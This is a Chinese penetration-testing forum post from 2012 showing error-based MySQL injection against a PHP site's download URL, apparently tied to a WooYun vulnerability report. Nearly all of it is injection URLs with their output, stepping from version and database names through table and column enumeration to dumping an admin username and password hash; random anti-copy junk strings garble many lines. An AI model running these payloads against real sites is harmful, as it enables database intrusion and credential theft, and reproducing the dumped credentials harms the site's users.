找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
返回列表 发新帖
查看: 2649|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666' J# D9 u3 m  K8 g; O

3 w, t8 g7 h7 r: o! O之前想找个测试 没想到这有 可以测试下做个记录而已 * X' P8 ]' u; Q9 h  t) f
% O7 }% F. m8 k
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0037 X. O0 z* Q0 S
/ B' n& z8 u: O/ k7 D
/data0/htdocs/leqi_new/app/myapp.php2 R7 e5 ]& N3 c1 F
& z: D. J5 O) |4 T! W* G
或者& n6 R( Q. A. G9 y9 Y: t# ~( S6 I' ^
& w  t! \* ~* S' g1 P/ M, m
/**********version()**********/ 5.1.49-log
0 G/ E" B- y% z, O# L1 Y. dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) k' W& x3 [$ M- N+ F7 d9 Z
/ I$ C) j2 T# g/ J. a$ x7 o
/**********user()**********/  
" l! l4 |9 M7 L7 |2 yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 X. H" I0 y) p5 Q

) K" E9 n& z2 K- E2 C0 t/**********database()**********/  leqi
. P4 t2 S  @$ P( v: Ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! V$ L+ F9 W2 o3 \3 ?8 }7 u& S+ P$ G  V* H  K% N
/**********limit依次递归爆库**********/* Z. c& V- i0 l+ W% V
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 n! X. w9 q1 z8 Y7 d( ]information_schema: c5 A  N; T1 @. @+ Z! S% K. j1 s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- w5 Z9 q8 [- l) X
leqi
. j. \# e1 {, z/ R' _+ g) R0 Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 A) `2 u- c/ s. R' Y& Z) Y
test! f( u/ |+ a8 ]$ Y  ^6 t
. @( S, d: u* _7 Q
/**********limit依次递归爆表名**********/
% I9 Q4 a8 T, A% X- T5 r4 y% Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- b3 N6 F6 D+ U8 _: x# K- O
users6 X+ O8 r3 k0 {, i: Y+ r  v" G

; m" }3 V1 R- }, G* \& L" c7 d( |$ _0 G/**********limit依次递归爆字段名**********/6 z% ~3 O! C8 n2 D6 q9 c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003& ^# j) \0 c( F7 ?7 V# \
user_id,username,nickname,passwd,group_id
, }3 ^! D" {4 t+ k& Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 A- z- g0 X9 d0 o. h1 x8 c/wapc/5000_0005_003
' d  F0 n, G7 b; y* o11 21* ]1 K; @6 C$ E/ b2 f) p$ ^
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
; b' d9 U6 H. V1 U/wapc/5000_0005_003- D1 V1 \7 k; n8 r6 R: s* _( M
11 341 351 361
* t) F9 G) m7 ~* K8 m/**********爆数据**********/" t" w7 n8 Z4 o! G# S& o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 }6 k- ~7 w% \/ q  o8 Badmin
+ X# R  H7 d5 I+ v! Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& j1 n* o9 J& n$ `. z6a8b4574ca231eb8bd52764d4978ffcd
1 z* j. o! g; p* h+ y& X5 }5 \: U7 v3 _4 u% j* U  h, T
, {; w# s" u4 ~3 a' }3 X/ b
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表